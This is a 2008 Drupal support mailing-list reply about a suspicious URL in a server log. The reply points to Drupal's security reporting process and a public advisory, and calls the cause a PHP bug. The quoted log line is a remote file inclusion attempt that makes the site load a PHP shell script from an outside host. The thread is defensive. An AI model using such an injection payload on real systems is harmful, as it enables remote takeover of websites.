[support] Strange url from log

Greg Knaddison greg at pingvox.com
Sun Jan 6 19:39:14 UTC 2008


The most important thing here is that when you have a potential
security issue the proper way to submit it is documented on
http://drupal.org/security-team which can also be found via
http://drupal.org/security  If you send the potential exploit to a
public channel like a listserve or the Drupal.org issue queue, then
that makes the job of the security team and all other Drupal users
much harder because everyone has to scramble to find a fix and get it
installed as soon as possible.

On Jan 6, 2008 6:17 PM, michel <michel at ziobudda.net> wrote:
>  drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?
>  where http://my3dwork.com/images/on.txt is  a php shell script.
>  any 0-day bug ?

This is not a bug in Drupal per se, but rather a PHP bug.  Because the
Security Team was seeing a few reports of logs like this we decided to
make a "Public Service Announcement" back in October -
http://drupal.org/node/184313  That announcement describes the nature
of the problem and the proper actions to take to prevent the attack
from succeeding on your site.


Greg Knaddison
Denver, CO | http://knaddison.com
World Spanish Tour | http://wanderlusting.org/user/greg

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